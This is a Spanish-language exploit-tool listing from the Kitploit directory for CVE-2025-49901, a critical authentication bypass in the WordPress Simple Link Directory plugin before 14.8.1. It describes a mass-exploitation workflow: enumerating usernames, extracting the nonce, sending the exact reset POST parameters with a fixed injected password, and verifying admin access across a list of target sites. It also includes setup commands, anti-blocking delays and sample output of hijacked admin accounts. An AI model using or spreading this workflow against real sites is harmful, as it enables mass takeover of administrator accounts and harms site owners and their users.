Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49901 — El plugin Simple Link Directory de WordPress < 14.8.1 es vulnerable a una Autenticación Rota de alta prioridad. | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-49901
Autenticación y AutorizaciónReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones Web
GitHubnxploited/cve-2025-49901

CVE-2025-49901

El plugin Simple Link Directory de WordPress < 14.8.1 es vulnerable a una Autenticación Rota de alta prioridad.

Ver Repositorio
2hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-49901

El plugin Simple Link Directory de WordPress < 14.8.1 es vulnerable a una Autenticación Rota de alta prioridad

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           Authentication Bypass → Password Reset → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ Vulnerabilidad

El formulario de restablecimiento de contraseña qc-opd expuesto en las páginas de SLD acepta un nombre de usuario y una nueva contraseña sin verificar la identidad del usuario mediante ningún token, confirmación por correo electrónico o verificación de capacidades. Un atacante no autenticado puede enumerar nombres de usuario de WordPress, enviar el formulario de restablecimiento para cualquier cuenta y autenticarse inmediatamente con la contraseña inyectada, obteniendo acceso de administrador sin interacción del usuario objetivo.


▸ Flujo de Ataque

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Localizar la página de restablecimiento de SLD      │
│     Probar 28+ rutas → coincidencia: "sld" + "_wpnonce" + formulario │
│                                                         │
│  2. Extraer nonce                                       │
│     Parsear _wpnonce desde HTML / JS / qc-opd-nonce     │
│                                                         │
│  3. Enumerar nombres de usuario                         │
│     /?author=1..10 + /wp-json/wp/v2/users + nombre de host │
│                                                         │
│  4. Restablecer contraseña para cada usuario            │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<usuario>                                │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verificar acceso (modo dual)                        │
│     Modo sesión → verificación de cookie + sondeos de /wp-admin/ │
│     Modo contraseña → wp-login.php + verificación de panel admin │
│                                                         │
│  6. Escribir aciertos confirmados → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ Configuración

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ Uso

root@kitploit:~
Archivo de lista de objetivos → list.txt (un host por línea)
Hilos → predeterminado 5
Timeout HTTP → predeterminado 10s
Retardo MIN/MAX por usuario → limitador anti-bloqueo (predeterminado 0.3 / 0.7s)
Retardo entre sitios → predeterminado 1.0s
Archivo de salida → scan_results/reset_mass_success.txt

Formato de objetivos:

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

Contraseña fija inyectada en todos los restablecimientos:

root@kitploit:~
newhackerpass123

▸ Fuentes de Enumeración de Usuarios

MétodoEndpoint
Redirección por autor/?author=1 →

▸ Lógica de Verificación de Admin

Después de cada intento de restablecimiento, la herramienta verifica el acceso usando dos métodos independientes:

root@kitploit:~
Session mode   →  checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode  →  full wp-login.php POST + multi-path admin panel probe

Indicadores de admin verificados:

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ Formato de Salida de Terminal

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ Archivo de Salida

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ Autor

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ Aviso Legal

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Link Directory < 14.8.1 · Corregido en 14.8.1

Descargar herramienta
CVECVE-2025-49901
CVSS9.8 CRÍTICA — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
Pluginquantumcloud Simple Link Directory (qc-simple-link-directory)
AfectadoTodas las versiones < 14.8.1
AuthNinguna requerida
TipoBypass de Autenticación mediante Ruta Alternativa (CWE-288)
CWECWE-288 · Bypass de Autenticación usando una Ruta o Canal Alternativa
/?author=10
API REST/wp-json/wp/v2/users
Nombre de hostPrimera etiqueta del dominio como fallback
Codificadoadmin siempre incluido